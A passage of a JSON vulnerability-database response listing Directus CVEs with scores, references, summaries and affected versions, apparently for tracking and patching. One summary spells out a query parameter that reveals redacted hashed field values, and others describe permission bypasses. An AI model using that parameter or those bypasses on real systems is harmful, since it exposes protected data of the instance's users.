lnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53887","GHSA-rmjh-cf9q-pv7q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rren-vtar-23fm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49725?format=json","vulnerability_id":"VCID-s39d-aw92-hydh","summary":"Directus is a real-time API and App dashboard for managing SQL database content. A user with permission to view any collection using redacted hashed fields can get access the raw stored version using the `alias` functionality on the API. Normally, these redacted fields will return `**********` however  if we change the request to `?alias[workaround]=redacted` we can instead retrieve the plain text value for the field. This can be avoided by removing permission to view the sensitive fields entirely from users or roles that should not be able to see them. 
This vulnerability is fixed in 10.11.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55942","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55821","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708","reference_id":"CVE-2024-34708","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708"},{"reference_url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b","reference_id":"e70a90c267bea695afce6545174c2b77517d617b","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b"},{"reference_url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://git
hub.com/advisories/GHSA-p8v3-m643-4xqx"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31010?format=json","purl":"pkg:npm/directus@10.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p
46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0"}],"aliases":["CVE-2024-34708","GHSA-p8v3-m643-4xqx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s39d-aw92-hydh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90555?format=json","vulnerability_id":"VCID-tp8r-hnf7-fkaf","summary":"Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. 
Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15744","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15606","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749","reference_id":"CVE-2025-64749","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749"},{"reference_url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31","reference_id":"f99c9b89071f9d136cc9b0d0c182f2d24542bc31","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31"},{"reference_url":"https://github.com/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com
/advisories/GHSA-cph6-524f-3hgr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64749","GHSA-cph6-524f-3hgr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tp8r-hnf7-fkaf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/145868?format=json","vulnerability_id":"VCID-u121-7x5t-3fcg","summary":"Directus is a real-time API and App dashboard for managing SQL database content. 
Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474","reference_id":"","reference_type":"","scores":[{"value":"0.00828","scoring_system":"epss","scoring_elements":"0.75025","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00828","scoring_system":"epss","scoring_elements":"0.74955","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474"},{"reference_url":"https://github.com/directus/directus/issues/17119","reference_id":"17119","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/
AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/issues/17119"},{"reference_url":"https://github.com/directus/directus/pull/17120","reference_id":"17120","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/pull/17120"},{"reference_url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/32456?format=json","purl":"pkg:npm/directus@9.23.0",
"is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-f3pv-2cf5-3bg8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/393033?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-f3pv-2cf5-3bg8"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://
public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-27474","GHSA-4hmq-ggrm-qfc6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u121-7x5t-3fcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55644?format=json","vulnerability_id":"VCID-u4er-eddz-g7aq","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 10.8.3, the exact Directus version number was being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. The problem has been resolved in versions 10.8.3 and newer.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296","reference_id":"","reference_type":"","scores":[{"value":"0.00437","scoring_system":"epss","scoring_elements":"0.63623","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00437","scoring_system":"epss","scoring_elements":"0.63521","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0","reference_id":"a5a1c26ac48795ed3212a4c51b9523588aff4fa0","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{
"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296","reference_id":"CVE-2024-27296","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296"},{"reference_url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29477?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerabil
ity":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27296","GHSA-5mhg-wv8w-p59j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u4er-eddz-g7aq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71570?format=json","vulnerability_id":"VCID-u5hw-p46t-jybc","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus' TUS resumable upload endpoint (/files/tus) allows any authenticated user with basic file upload permissions to overwrite arbitrary existing files by UUID. 
The TUS controller performs only collection-level authorization checks, verifying the user has some permission on directus_files, but never validates item-level access to the specific file being replaced. As a result, row-level permission rules (e.g., \"users can only update their own files\") are completely bypassed via the TUS path while being correctly enforced on the standard REST upload path. This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02424","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02422","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412"},{"reference_url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89","reference_id":"GHSA-qqmv-5p3g-px89","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89","reference_id":"GHSA-qqmv-5p3g-px89","reference_type":"","scores":[{"value":"7.1","
scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T16:23:08Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35412","GHSA-qqmv-5p3g-px89"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u5hw-p46t-jybc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/212209?format=json","vulnerability_id":"VCID-ua8h-tmak-hufd","summary":"Duplicate Advisory: Improper access control in 
Directus","references":[{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3","reference_id":"GHSA-q83v-hq3j-4pq3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33132?format=json","purl":"pkg:npm/directus@10.13.1","is_vulnerable":true,"affected_by_vulnerabil